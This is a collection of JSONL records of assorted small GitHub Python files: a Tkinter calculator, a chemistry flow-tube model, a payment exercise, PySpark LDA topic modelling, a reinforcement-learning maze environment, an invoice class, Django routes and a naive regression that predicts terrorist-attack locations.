\")^2\")\n self.lists.clear()\n self.lists.append(str(end_num)) # 这里必须转换成字符型才能拼接相加,数据类型不同的不允许拼接\n\n def operation(self, op):\n if len(self.lists) > 0:\n if self.lists[-1] in [\"+\", \"-\", \"*\", \"/\"]:\n self.lists[-1] = op # 以上代码表示可以随时更换加减乘除\n else:\n self.lists.append(op)\n self.rst1.set(\"\".join(self.lists))\n else:\n self.rst2.set(\"没有可加的对象!\")\n\n def cal_result(self, op1):\n if op1 == \"=\":\n if len(self.lists) > 0:\n if operator.eq(self.lists, ['1','+']):\n self.lists.clear()\n self.rst2.set(\"机会来了,猪都可以上天!\")\n self.rst1.set(\"0\")\n else:\n if self.lists[-1] in [\"+\", \"-\", \"x\", \"/\"]:\n del self.lists[-1]\n else:\n new_str = \"\".join(self.lists) # 这里转换成字符串是为了后面的过程框接收字符串用的\n end_rst = eval(new_str)\n self.rst2.set(end_rst)\n self.rst1.set(new_str)\n self.lists.clear()\n self.lists.append(str(end_rst)) # 供下次继续计算,这里必须要做一个转换,将数值型转换成字符串\n\n def press_num(self, num):\n self.lists.append(num)\n self.rst1.set(\"\".join(self.lists))\n\n def rollback(self):\n if len(self.lists) > 0:\n del self.lists[-1]\n if len(self.lists) == 0:\n self.rst1.set(\"0\")\n else:\n com_str = \"\".join(self.lists)\n self.rst1.set(com_str)\n else:\n self.rst2.set(\"没有要删除的对象\")\n\n def menu_tools(self):\n menubar = Menu(self.master)\n aboutmenu = Menu(menubar, tearoff=0)\n moremenu = Menu(menubar, tearoff=0)\n aboutmenu.add_command(label=\"关于\", command=self.about)\n moremenu.add_command(label=\"更多\", command=self.more)\n menubar.add_cascade(label=\"Creator\", menu=aboutmenu)\n menubar.add_cascade(label=\"帮助\", menu=moremenu)\n self.master.config(menu=menubar)\n def about(self):\n messagebox.showinfo(\"Message\", \"Desinger by mengen\")\n\n def more(self):\n messagebox.showinfo(\"Help\", \"还没有写好帮助文档,有时间在写\")\n\n def show_info(self, e):\n messagebox.showinfo(\"快捷键窗口\", \"人生弯弯曲曲水\\n岁岁重重叠叠山\")\n\n\nif __name__ == '__main__':\n root = Tk()\n Calculator(root)","repo_name":"mengen9/code_notebook","sub_path":"2020_python/PythonTkinter项目实战/计算器.py","file_name":"计算器.py","file_ext":"py","file_size_in_byte":8149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"18205401446","text":"def cmd_calib5(const_comp_conc, params, Init_comp_conc, Q1, Q2):\n # %% import packages\n import numpy as np\n import RO2_conc\n import sch_interr\n import eqn_interr\n import eqn_pars\n import init_conc\n import RO2_indices\n import rate_coeffs\n import write_rate_file\n import cal_const_comp_conc\n from judg_spe_reac_rates import jude_species as jude_species\n from get_diff_and_u import get_diff_and_u_for_more_species\n from get_formula import get_formula\n from model_1 import model_1\n from model_3 import model_3\n from model_4 import model_4\n from meanconc_cal import meanconc_cal\n from grid_parameters import grid_para as grid_para\n\n # % load the inputs\n T = params['T'] # constant species\n p = params['p'] # temperature\n R1 = params['R1'] # diameters for first tube\n R2 = params['R2'] # diameters for second tube\n L1 = params['L1'] # length for first tube\n L2 = params['L2'] # length for second tube\n Q1 = Q1 / 60 # flow for first tube\n Q2 = Q2 / 60 # flow for second tube\n sch_name = params['sch_name'] # file for the MCM file\n chm_sch_mrk = ['{', 'RO2', '+', '', '', ';', '+', ';', '$', '{', ':', ';', '}'] #params['chm_sch_mrk'] # markers to isolate sections of chemical scheme based on MCM KPP format\n const_comp = params['const_comp']\n Init_comp = params['Init_comp']\n Diff_setname = params['Diff_setname']\n Diff_set = params['Diff_set']\n con_infl_nam = const_comp\n Zgrid = params['Zgrid'] # number of grid points in tube length direction\n Rgrid = params['Rgrid'] # number of grid points in tube radius direction\n key_spe_for_plot = params['key_spe_for_plot'] # key species for plot\n plot_spec = params['plot_spec'] # plot species\n dt = params['dt']\n flag_tube = params['flag_tube']\n const_comp_free = params['const_comp_free'] # the species in dilution flow\n const_comp_conc_free = params['const_comp_conc_free']\n\n # read the file and separate the equations and rate coefficients\n eqn_list, num_eqn, rrc, rrc_name, RO2_names, eqn_list_on = sch_interr.sch_interr(chm_sch_mrk, sch_name)\n #print(eqn_list_on)\n # find the comp_namelist reac_coef, and indx for products and reactants\n [rindx, rstoi, pindx, pstoi, reac_coef, nreac, nprod, comp_namelist, comp_num] = eqn_interr.eqn_interr(\n num_eqn, eqn_list, chm_sch_mrk)\n # find RO2 and the constant concentration\n RO2_indx, HOMRO2_indx, con_C_indx = eqn_pars.extr_mech(sch_name, chm_sch_mrk,\n con_infl_nam, const_comp)\n\n RO2_indi = RO2_indices.RO2_indices(comp_namelist, RO2_names)\n # get the diffusion for all species and the index of species in C except constant compounds\n\n u, Diff_vals = get_diff_and_u_for_more_species(comp_namelist, Diff_setname, con_C_indx, Diff_set, T, p)\n\n numLoop = 500 # number of times to run to reach the pinhole of the instrument\n timesteps = 1000 # number of timesteps, dt * timesteps * numLoop is time elapsed in the final solution\n\n # Change odd number Rgrid to even number grid\n if (Rgrid % 2) != 0:\n Rgrid = Rgrid + 1\n # % apply all the concentration for the constant comp\n const_comp_gird = cal_const_comp_conc.cal_const_comp_conc(Rgrid, Zgrid, const_comp_conc, L1, L2, const_comp)\n # % set the concentration for all the species for the grid of 80*40 in c\n c = np.zeros([Rgrid, Zgrid, comp_num])\n\n for i in Init_comp: # set [OH] at z = 0 # set [HO2] at z = 0 [oh]\n c[:, 0, comp_namelist.index(i)] = Init_comp_conc[Init_comp.index(i)]\n for i in const_comp: # set the constant concentrations for const_comp\n c[:, :, comp_namelist.index(i)] = const_comp_gird[const_comp.index(i)]\n\n # % write the rate coefficients in a new file (rate_coeffs.py)\n write_rate_file.write_rate_file(reac_coef, p, rrc, rrc_name, 0)\n # % store the first column of the initial concentration into C0\n C0 = c[0, 0, :]\n # % store indx for products and reactants to dydt_vst, and the initial concentration for first column\n [y, M, dydt_vst] = init_conc.init_conc(comp_num, comp_namelist, C0, T, p, comp_namelist, \\\n rindx, pindx, num_eqn[0], nreac, nprod,\n comp_namelist, \\\n RO2_indx, HOMRO2_indx, rstoi, pstoi)\n # % calculate the RO2 concentration\n RO2conc = RO2_conc.RO2_conc(RO2_indi, y)\n # % calculate H2O, O2, NO, HO2, NO3\n op = jude_species(y, comp_namelist)\n # % calculate reaction rate coefficients values\n\n rate_values = rate_coeffs.evaluate_rates(RO2conc, T, 0, M, M * 0.7809, op[0], op[1], op[2], op[3],\n op[4], p)\n # used as the title for the plotted figures\n formula = get_formula(plot_spec)\n # % set the grids parameters\n Rtot, dr, dx, sp_line = grid_para(Zgrid, Rgrid, R2, R1, L2, L1, comp_num)\n #print(rate_values)\n #print(comp_namelist)\n #print(comp_num)\n # %% run the modules and plot\n if flag_tube == '3':\n c = model_3(R2, R1, Rgrid, Zgrid, comp_num, L2, L1, numLoop, comp_namelist, key_spe_for_plot, dt, timesteps,\n Diff_vals, Rtot, Q1, Q2, dydt_vst, rindx, nreac, rstoi, rate_values, const_comp, u, plot_spec,\n formula, c, dr, dx,params['model_mode'],const_comp_conc)\n elif flag_tube == '4':\n c = model_4(R2, R1, Rgrid, Zgrid, comp_num, L2, L1, numLoop, comp_namelist, key_spe_for_plot, dt, timesteps,\n Diff_vals, Rtot, const_comp_free, const_comp_conc_free, Q1, Q2, dydt_vst, rindx, nreac, rstoi,\n rate_values,\n const_comp, u, plot_spec, formula, c, dr, dx,params['model_mode'])\n else: # model 1 and model 2 they are same\n # % run once with two different tubes or one tube\n c = model_1(R2, Rgrid, Zgrid, L2, L1, numLoop, comp_namelist, key_spe_for_plot, dt,\n timesteps, Diff_vals, Rtot, Q1, dydt_vst, rindx, nreac, rstoi, rate_values, const_comp, u,\n plot_spec, formula, c, dr, dx, params['model_mode'])\n # % calculate the meanconc for each species\n meanConc = meanconc_cal(R2, Rgrid, plot_spec, comp_namelist, c, params['model_mode'])\n\n return meanConc, c","repo_name":"momo-catcat/MARFORCE-flowtube","sub_path":"PANDA520_flowtube/Funcs/cmd_calib5.py","file_name":"cmd_calib5.py","file_ext":"py","file_size_in_byte":6337,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"22813167006","text":"preço = float(input('Informe o preço normal: '))\ncondição = int(input('Informe a condição de pagamento:\\n[1]- Dinheiro/cheque\\n[2]- Cartão\\n[3]- Cartão(2x)\\n[4]- Cartão(3x ou +)\\nSua Opção:'))\n\nif condição == 1:\n dinheiro = preço - (preço * 0.10)\n print('Pagando á vista você recebe um desconto de 10%, o valor final do item será R${:.2f}'.format(dinheiro))\n\nelif condição == 2:\n dinheiro = preço - (preço * 0.05)\n print('Pagando no cartão você recebe um desconto de 5%, o valor final do item será R${:.2f}'.format(twox, dinheiro))\n\nelif condição == 3:\n total = preço\n parcela = total / 2\n print('Sua compra será parcelada em 2x de R${:.2f}, O valor final do item: R${:.2f}'.format(parcela ,preço))\n\nelif condição == 4:\n parcela = int(input('Quantas parcelas: (3x ou +)\\nInforme:'))\n juros = (preço / parcela) + (preço * 0.20) / parcela\n final = preço + (preço * 0.20)\n print('Sua compra será parcelada em {}x de R${:.2f} COM JUROS\\nSua compra de R${:.2f} vai custar R${:.2f} no final'.format(parcela, juros, preço, final))\n\nelse:\n condição = 0\n print('Opção invalida de pagamento')\n ","repo_name":"Gabrielsb1/Python","sub_path":"Exercicios em python/ex44.py","file_name":"ex44.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28355903932","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue May 8 06:34:07 2018\r\n\r\n@author: logaprakash\r\n\"\"\"\r\n\r\nfrom collections import defaultdict\r\nfrom pyspark import SparkContext\r\nfrom pyspark.mllib.linalg import Vectors\r\nfrom pyspark.mllib.clustering import LDA\r\nfrom pyspark.sql import SQLContext\r\nimport re\r\nimport numpy as np\r\nimport csv\r\nfrom time import time\r\n\r\na = time()\r\n\r\ndef document_vector(document):\r\n id = document[1]\r\n counts = defaultdict(int)\r\n for token in document[0]:\r\n if token in vocabulary:\r\n token_id = vocabulary[token]\r\n counts[token_id] += 1\r\n counts = sorted(counts.items())\r\n keys = [x[0] for x in counts]\r\n values = [x[1] for x in counts]\r\n return (id, Vectors.sparse(len(vocabulary), keys, values))\r\n\r\n\r\nsc = SparkContext('local', 'PySPARK LDA')\r\nsql_context = SQLContext(sc)\r\n\r\ndata = sc.wholeTextFiles('/home/sakshi/Documents/big_data/data/*').map(lambda x: x[1])\r\n\r\nnum_of_stop_words = 50 \r\nnum_topics = 15\t \r\nnum_words_per_topic = 100 \r\nmax_iterations = 35 \r\n\r\n\r\ntokens = data \\\r\n .map( lambda document: document.strip().lower()) \\\r\n .map( lambda document: re.split(\"[\\s;,#]\", document)) \\\r\n .map( lambda word: [x for x in word if x.isalpha()]) \\\r\n .map( lambda word: [x for x in word if len(x) > 3] )\r\n\r\n\r\ntermCounts = tokens \\\r\n .flatMap(lambda document: document) \\\r\n .map(lambda word: (word, 1)) \\\r\n .reduceByKey( lambda x,y: x + y) \\\r\n .map(lambda tuple: (tuple[1], tuple[0])) \\\r\n .sortByKey(False)\r\n \r\nthreshold_value = termCounts.take(num_of_stop_words)[num_of_stop_words - 1][0]\r\n\r\nvocabulary = termCounts \\\r\n .filter(lambda x : x[0] < threshold_value) \\\r\n .map(lambda x: x[1]) \\\r\n .zipWithIndex() \\\r\n .collectAsMap()\r\n\r\ndocuments = tokens.zipWithIndex().map(document_vector).map(list)\r\n#inv_voc = {value: key for (key, value) in vocabulary.items()}\r\n\r\nlda_model = LDA.train(documents, k=num_topics, maxIterations=max_iterations)\r\ntopic_indices = lda_model.describeTopics(maxTermsPerTopic=num_words_per_topic)\r\ntopic_document_matrix = lda_model.topicsMatrix()\r\ndocument_data_df = documents.map(lambda x: (x[0], x[1])).toDF((\"DocID\",\"Word_Counts\"))\r\nword_data = document_data_df.select('Word_Counts').rdd.map(lambda x: x[0]) \r\n\r\n\"\"\"\r\nVectorizing\r\n\"\"\"\r\ndocument_data_list = word_data.collect()\r\nnum_docs = len(document_data_list)\r\nvocab_len = len(vocabulary)\r\n\r\nvectors = np.zeros((num_docs,num_topics))\r\n\r\nfor document in range(0,num_docs):\r\n for topic in range(0,num_topics):\r\n for word in range(0,vocab_len):\r\n if document_data_list[document][word] != 0.0:\r\n vectors[document][topic] += document_data_list[document][word] * topic_document_matrix[word][topic]\r\n\r\n\r\n\r\n\"\"\"\r\nSaving required frames\r\n\"\"\"\r\nnp.savetxt(\"/home/sakshi/Documents/big_data/vectors.csv\", vectors, delimiter=\",\")\r\nnp.savetxt(\"/home/sakshi/Documents/big_data/topic_word_matrix.csv\", topic_document_matrix, delimiter=\",\")\r\n\r\nwith open('/home/sakshi/Documents/big_data/vocabulary.csv', 'w') as f: # Just use 'w' mode in 3.x\r\n w = csv.DictWriter(f, vocabulary.keys())\r\n w.writeheader()\r\n w.writerow(vocabulary)\r\n\r\n\"\"\"\r\nEnding session\r\n\"\"\"\r\nsc.stop()\r\n\r\nb = time() -a","repo_name":"logaprakash/Ranking-MRF","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"12565926839","text":"import numpy as np\nimport random\nimport json\nimport os\nfrom sklearn.metrics.pairwise import euclidean_distances\nimport math\nimport copy\n\n\nclass TwoStageSPVisualMaze:\n def __init__(self, config, randomSeed=1):\n \"\"\"\n A model take in a particle configuration and actions and return updated a particle configuration\n \"\"\"\n\n self.config = config\n self.randomSeed = randomSeed\n self.read_config()\n self.initilize()\n\n # self.padding = self.config['']\n\n def initilize(self):\n if not os.path.exists('Traj'):\n os.makedirs('Traj')\n # import parameter for vector env\n self.viewer = None\n self.steps_beyond_done = None\n self.stepCount = 0\n\n self.numStages = 2\n\n self.nbActions = [2, 1]\n\n self.info = {}\n\n self.Dr = 0.161\n self.Dt = 2.145e-14\n self.tau = 1 / self.Dr # tau about 6.211180124223603\n self.a = 1e-6\n self.Tc = 0.1 * self.tau # Tc is control interval\n self.v = 2 * self.a / self.Tc\n self.angleStd = math.sqrt(2 * self.Tc * self.Dr)\n self.xyStd = math.sqrt(2 * self.Tc * self.Dt) / self.a\n\n random.seed(self.randomSeed)\n np.random.seed(self.randomSeed)\n\n self.initObsMat()\n self.constructSensorArrayIndex()\n self.epiCount = -1\n\n\n def read_config(self):\n\n self.receptHalfWidth = self.config['agentReceptHalfWidth']\n self.padding = self.config['obstacleMapPaddingWidth']\n self.receptWidth = 2 * self.receptHalfWidth + 1\n self.targetClipLength = 2 * self.receptHalfWidth\n self.stateDim = (self.receptWidth, self.receptWidth)\n\n self.sensorArrayWidth = (2 * self.receptHalfWidth + 1)\n\n self.endStep = 500\n if 'episodeLength' in self.config:\n self.endStep = self.config['episodeLength']\n\n self.startThresh = 1\n self.endThresh = 1\n self.distanceThreshDecay = 10000\n\n self.targetThreshFlag = False\n\n if 'targetThreshFlag' in self.config:\n self.targetThreshFlag = self.config['targetThreshFlag']\n\n if 'target_start_thresh' in self.config:\n self.startThresh = self.config['target_start_thresh']\n if 'target_end_thresh' in self.config:\n self.endThresh = self.config['target_end_thresh']\n if 'distance_thresh_decay' in self.config:\n self.distanceThreshDecay = self.config['distance_thresh_decay']\n\n self.obstacleFlg = True\n if 'obstacleFlag' in self.config:\n self.obstacleFlg = self.config['obstacleFlag']\n\n self.actionPenalty = 0.0\n if 'actionPenalty' in self.config:\n self.actionPenalty = self.config['actionPenalty']\n\n self.scaleFactor = 20.0\n if 'scaleFactor' in self.config:\n self.scaleFactor = self.config['scaleFactor']\n\n self.obstaclePenalty = 0.0\n if 'obstaclePenalty' in self.config:\n self.obstaclePenalty = self.config['obstaclePenalty']\n\n self.transitionDistance = 3.0\n if 'transitionDistance' in self.config:\n self.transitionDistance = self.config['transitionDistance']\n\n\n def thresh_by_episode(self, step):\n return self.endThresh + (\n self.startThresh - self.endThresh) * math.exp(-1. * step / self.distanceThreshDecay)\n\n def constructSensorArrayIndex(self):\n x_int = np.arange(-self.receptHalfWidth, self.receptHalfWidth + 1)\n y_int = np.arange(-self.receptHalfWidth, self.receptHalfWidth + 1)\n [Y, X] = np.meshgrid(y_int, x_int)\n self.senorIndex = np.stack((X.reshape(-1), Y.reshape(-1)), axis=1)\n\n def getHindSightExperience(self, state, action, nextState, done, info):\n\n # if hit an obstacle or if action is to keep still\n if self.hindSightInfo['obsFlag'] or self.stageID == 0:\n return None, None, None, None, None\n elif self.stageID == 1 and not done:\n targetNew = self.hindSightInfo['currentState'][0:2]\n\n distance = targetNew - self.hindSightInfo['previousState'][0:2]\n phi = self.hindSightInfo['previousState'][2]\n\n sensorInfoMat = self.getSensorInfoFromPos(self.hindSightInfo['previousState'])\n\n # distance will be changed from lab coordinate to local coordinate\n dx = distance[0] * math.cos(phi) + distance[1] * math.sin(phi)\n dy = - distance[0] * math.sin(phi) + distance[1] * math.cos(phi)\n\n if self.obstacleFlg:\n state = {'sensor': sensorInfoMat,\n 'target': np.array(\n [dx / self.scaleFactor, dy / self.scaleFactor])}\n else:\n state = np.array([dx / self.scaleFactor, dy / self.scaleFactor])\n nextState = np.array([0.0, 0.0])\n\n actionNew = action\n # here [0, 0] is dummy input to ensure done is always true\n return state, actionNew, nextState, 1.0, True\n\n\n def getSensorInfo(self):\n # sensor information needs to consider orientation information\n # add integer resentation of location\n # index = self.senorIndex + self.currentState + np.array([self.padding, self.padding])\n phi = self.currentState[2]\n # phi = (self.stepCount)*math.pi/4.0\n # this is rotation matrix transform from local coordinate system to lab coordinate system\n rotMatrx = np.matrix([[math.cos(phi), -math.sin(phi)],\n [math.sin(phi), math.cos(phi)]])\n transIndex = np.matmul(self.senorIndex, rotMatrx.T).astype(np.int)\n\n i = math.floor(self.currentState[0] + 0.5)\n j = math.floor(self.currentState[1] + 0.5)\n\n transIndex[:, 0] += self.padding + i\n transIndex[:, 1] += self.padding + j\n\n # use augumented obstacle matrix to check collision\n self.sensorInfoMat = self.obsMap[transIndex[:, 0], transIndex[:, 1]].reshape(self.receptWidth, -1)\n\n def getSensorInfoFromPos(self, position):\n\n phi = position[2]\n # phi = (self.stepCount)*math.pi/4.0\n # this is rotation matrix transform from local coordinate system to lab coordinate system\n rotMatrx = np.matrix([[math.cos(phi), -math.sin(phi)],\n [math.sin(phi), math.cos(phi)]])\n transIndex = np.matmul(self.senorIndex, rotMatrx.T).astype(np.int)\n\n i = math.floor(position[0] + 0.5)\n j = math.floor(position[1] + 0.5)\n\n transIndex[:, 0] += self.padding + i\n transIndex[:, 1] += self.padding + j\n\n # use augumented obstacle matrix to check collision\n sensorInfoMat = self.obsMap[transIndex[:, 0], transIndex[:, 1]].reshape(self.receptWidth, -1)\n\n # use augumented obstacle matrix to check collision\n return np.expand_dims(sensorInfoMat, axis=0)\n\n def rewardCal(self):\n reward = 0.0\n\n # if pass the time limit and not finish give zero reward\n if self.stepCount > self.endStep:\n self.done['stage'] = [True for _ in range(self.numStages)]\n self.done['global'] = True\n print('not finish ', self.currentState, self.stageID)\n return reward, copy.deepcopy(self.done)\n\n\n distance = self.targetState - self.currentState[0:2]\n\n if self.is_terminal(distance):\n self.done['stage'][self.stageID] = True\n self.done['global'] = True\n reward = 1.0\n print('finish ', self.currentState, reward, self.stageID)\n\n return reward, copy.deepcopy(self.done)\n\n def step(self, action):\n self.hindSightInfo['previousState'] = self.currentState.copy()\n # update step count\n self.stepCount += 1\n # if self.customExploreFlag and self.epiCount < self.customExploreEpisode:\n # action = self.getCustomAction()\n jmRaw = np.array([random.gauss(0, self.xyStd) + 2.0 * action,\n random.gauss(0, self.xyStd),\n random.gauss(0, self.angleStd)], dtype=np.float32)\n\n\n\n\n\n # converting from local to lab coordinate movement\n phi = self.currentState[2]\n dx = jmRaw[0] * math.cos(phi) - jmRaw[1] * math.sin(phi)\n dy = jmRaw[0] * math.sin(phi) + jmRaw[1] * math.cos(phi)\n # check if collision will occur\n i = math.floor(self.currentState[0] + dx + 0.5) + self.padding\n j = math.floor(self.currentState[1] + dy + 0.5) + self.padding\n\n if self.obsMap[i, j] == 0:\n jm = np.array([dx, dy, jmRaw[2]], dtype=np.float32)\n self.hindSightInfo['obsFlag'] = False\n else:\n jm = np.array([0.0, 0.0, jmRaw[2]], dtype=np.float32)\n self.hindSightInfo['obsFlag'] = True\n\n\n # update current state using modified jump matrix\n self.currentState += jm\n # make sure orientation within 0 to 2pi\n self.currentState[2] = (self.currentState[2] + 2 * np.pi) % (2 * np.pi)\n self.hindSightInfo['currentState'] = self.currentState.copy()\n\n # transitions of stages\n distance = self.targetState - self.currentState[0:2]\n\n if self.stageID == 0 and np.linalg.norm(distance, ord=2) < self.transitionDistance:\n print('job passage', self.currentState, 'step', self.stepCount)\n self.done['stage'][self.stageID] = True\n self.stageID += 1\n\n\n\n reward, done = self.rewardCal()\n\n # distance will be changed from lab coordinate to local coordinate\n phi = self.currentState[2]\n dx = distance[0] * math.cos(phi) + distance[1] * math.sin(phi)\n dy = - distance[0] * math.sin(phi) + distance[1] * math.cos(phi)\n\n angle = math.atan2(dy, dx)\n if math.sqrt(dx**2 + dy**2) > self.targetClipLength:\n dx = self.targetClipLength * math.cos(angle)\n dy = self.targetClipLength * math.sin(angle)\n\n globalTargetX = self.currentState[0]+ dx * math.cos(phi) - dy * math.sin(phi)\n globalTargetY = self.currentState[1]+ dx * math.sin(phi) + dy * math.cos(phi)\n\n\n # update sensor information\n if self.obstacleFlg:\n self.getSensorInfo()\n\n self.info['stageID'] = self.stageID\n self.info['previousTarget'] = self.targetState.copy()\n self.info['currentState'] = self.currentState.copy()\n self.info['currentTarget'] = np.array([globalTargetX, globalTargetY])\n\n if self.obstacleFlg:\n state = {'state': {'sensor': np.expand_dims(self.sensorInfoMat, axis=0),\n 'target': np.array(\n [dx / self.scaleFactor, dy / self.scaleFactor])},\n 'stageID': self.stageID}\n else:\n state = {'stageID': self.stageID,\n 'state': np.array(\n [dx / self.scaleFactor, dy / self.scaleFactor])}\n\n return state, reward, done, self.info.copy()\n\n def is_terminal(self, distance):\n return np.linalg.norm(distance, ord=np.inf) < 0.5\n\n def reset_helper(self):\n\n\n\n self.currentState = np.array(self.config['currentState'], dtype=np.float32)\n self.targetState = np.array(self.config['targetState'], dtype=np.float32)\n # set target information\n targetThresh = float('inf')\n if self.targetThreshFlag:\n targetThresh = self.thresh_by_episode(self.epiCount) * max(self.mapMat.shape)\n\n if self.config['dynamicInitialStateFlag']:\n while True:\n col = random.randint(0, self.mapMat.shape[1] - 1)\n row = random.randint(0, self.mapMat.shape[0] - 1)\n distanceVec = np.array([row, col], dtype=np.float32) - self.targetState\n distance = np.linalg.norm(distanceVec, ord=np.inf)\n\n\n if self.mapMat[row, col] == 0 and distance < targetThresh and not self.is_terminal(distanceVec):\n break\n\n\n # set initial state\n print('target distance', distance)\n\n self.currentState = np.array([row, col, random.random() * 2 * math.pi],\n dtype=np.float32)\n\n if np.linalg.norm(distanceVec, ord=2) > self.transitionDistance:\n self.stageID = 0\n else:\n self.stageID = 1\n\n print('initial state, stageID', self.currentState, self.stageID)\n\n def reset(self):\n self.stepCount = 0\n self.hindSightInfo = {}\n self.info = {}\n self.epiCount += 1\n self.done = {'stage': [False for _ in range(self.numStages)], 'global': False}\n\n self.reset_helper()\n # update sensor information\n\n self.info['scaleFactor'] = self.scaleFactor\n self.info['stageID'] = self.stageID\n\n if self.obstacleFlg:\n self.getSensorInfo()\n\n distance = self.targetState - self.currentState[0:2]\n\n phi = self.currentState[2]\n dx = distance[0] * math.cos(phi) + distance[1] * math.sin(phi)\n dy = - distance[0] * math.sin(phi) + distance[1] * math.cos(phi)\n\n angle = math.atan2(dy, dx)\n if math.sqrt(dx**2 + dy**2) > self.targetClipLength:\n dx = self.targetClipLength * math.cos(angle)\n dy = self.targetClipLength * math.sin(angle)\n\n globalTargetX = self.currentState[0]+ dx * math.cos(phi) - dy * math.sin(phi)\n globalTargetY = self.currentState[1]+ dx * math.sin(phi) + dy * math.cos(phi)\n\n\n self.info['currentTarget'] = np.array([globalTargetX, globalTargetY])\n\n # angleDistance = math.atan2(distance[1], distance[0]) - self.currentState[2]\n if self.obstacleFlg:\n state = {'state': {'sensor': np.expand_dims(self.sensorInfoMat, axis=0),\n 'target': np.array([dx / self.scaleFactor, dy / self.scaleFactor])},\n 'stageID': self.stageID}\n else:\n state = {'stageID': self.stageID,\n 'state': np.array([dx / self.scaleFactor, dy / self.scaleFactor])}\n\n return state\n\n def initObsMat(self):\n fileName = self.config['mapName']\n self.mapMat = np.genfromtxt(fileName + '.txt')\n self.mapShape = self.mapMat.shape\n padW = self.config['obstacleMapPaddingWidth']\n obsMapSizeOne = self.mapMat.shape[0] + 2 * padW\n obsMapSizeTwo = self.mapMat.shape[1] + 2 * padW\n self.obsMap = np.ones((obsMapSizeOne, obsMapSizeTwo))\n self.obsMap[padW:-padW, padW:-padW] = self.mapMat\n np.savetxt(self.config['mapName'] + 'obsMap.txt', self.obsMap, fmt='%d', delimiter='\\t')","repo_name":"yangyutu/DeepReinforcementLearning-PyTorch","sub_path":"Env/CustomEnv/MultiStageMaze/TwoStageSPVisualMaze.py","file_name":"TwoStageSPVisualMaze.py","file_ext":"py","file_size_in_byte":14568,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"27"} +{"seq_id":"6896197601","text":"class CfdiComprobante:\n\n def __init__(self, version, fecha, sello, no_certificado, certificado, sub_total, moneda, total, tipo_comprobante, lugar_expedicion):\n self.xmlns = ''\n self.schema_location = []\n self.version = version\n self.serie = ''\n self.folio = ''\n self.fecha = fecha\n self.sello = sello\n self.forma_pago = ''\n self.no_certificado = no_certificado\n self.certificado = certificado\n self.condiciones_pago = ''\n self.sub_total = sub_total\n self.descuento = ''\n self.moneda = moneda\n self.tipo_cambio = ''\n self.total = total\n self.tipo_comprobante = tipo_comprobante\n self.metodo_pago = ''\n self.lugar_expedicion = lugar_expedicion\n self.confirmacion = ''\n self.cfdi_relacionados = ''\n self.cfdi_emisor = ''\n self.cfdi_receptor = ''\n self.cfdi_conceptos = []\n self.cfdi_impuestos = []\n self.cfdi_complemento = []\n self.addenda = ''\n\n def emisor(self, emisor):\n self.cfdi_emisor = emisor\n\n def receptor(self, receptor):\n self.cfdi_receptor = receptor\n\n def add_complemento(self, complemento):\n self.cfdi_complemento.append(complemento)\n\n def add_schema_location(self, schema):\n self.schema_location.append(schema)\n\n def comprobante_dict(self):\n return {\n 'cfdi:Comprobante': {\n '@xmlns': self.xmlns\n }\n }\n","repo_name":"adriancosme/facturacion-lib","sub_path":"src/cfdi_comprobante.py","file_name":"cfdi_comprobante.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"12188113546","text":"__author__ = 'jorgezavala'\nauthor__ = 'jorgezavala'\n\nfrom django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^profile', views.update_profile, name='profile'),\n url(r'^social_login$', views.social_login, name='social_login'),\n\n]","repo_name":"kinnevo/kic_alone","sub_path":"userprofile/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"32171122862","text":"from pandas import read_csv\nfrom sklearn import linear_model\n#from googleplaces import GooglePlaces\nfrom urllib.request import urlopen\nimport json\nimport warnings\n\ndef getplace(lat, lon):\n url = \"http://maps.googleapis.com/maps/api/geocode/json?\"\n url += \"latlng=%s,%s&sensor=false\" % (lat, lon)\n while True:\n try:\n v = urlopen(url).read()\n j = json.loads(v)\n components = j['results'][0]['formatted_address']\n flag = 0 # Successful data transfer in components \n print(components)\n except:\n flag = 1 # Unsuccessful data transfer in components\n if flag == 0:\n break\n\n\ndd = read_csv(\"Data.csv\", header=0, sep=\";\")\nX = dd[[\"year\"]]\ny1 = dd[[\"latitude\"]]\ny2 = dd[[\"longitude\"]]\ny3 = dd[[\"date\"]]\ny4 = dd[[\"month\"]]\nmodels = [('BayesianRidge', linear_model.BayesianRidge()),\n ('LassoLars', linear_model.LassoLars()),\n ('ARDRegression', linear_model.ARDRegression())]\nwith warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n year_input = input(\"Enter year for prediction of Terrorist attacks : \")\n year_input = float(year_input)\n for name,i in models:\n print(\"\\n\", name)\n print(\"===========================================\")\n clf = i\n clf.fit(X, y1)\n lat = clf.predict(year_input)\n for i in lat:\n new_lat = float(\"{0:.6f}\".format(i))\n print(\"Latitude : \", new_lat)\n clf.fit(X, y2)\n lng = clf.predict(year_input)\n for i in lng:\n new_lng = float(\"{0:.6f}\".format(i))\n print(\"Longitude : \", new_lng)\n clf.fit(X, y3)\n date = clf.predict(year_input)\n for i in date:\n dte = int(i)\n print(\"Date : \", dte)\n clf.fit(X, y4)\n month = clf.predict(year_input)\n for i in month:\n mnt = int(i)\n print(\"Month : \", mnt)\n print(\"Place deduced from latitude and longitude : \\n========\")\n getplace(new_lat, new_lng)","repo_name":"s10singh97/TAF","sub_path":"aa.py","file_name":"aa.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"17723073689","text":"#Loading dataframe \r\nimport pandas as pd\r\ncolumns = ['Year', 'No smoothing', 'Lowest', 'Africa', 'Asia', 'Europe' ,'North America', 'South America', 'Oceania']\r\ndf = 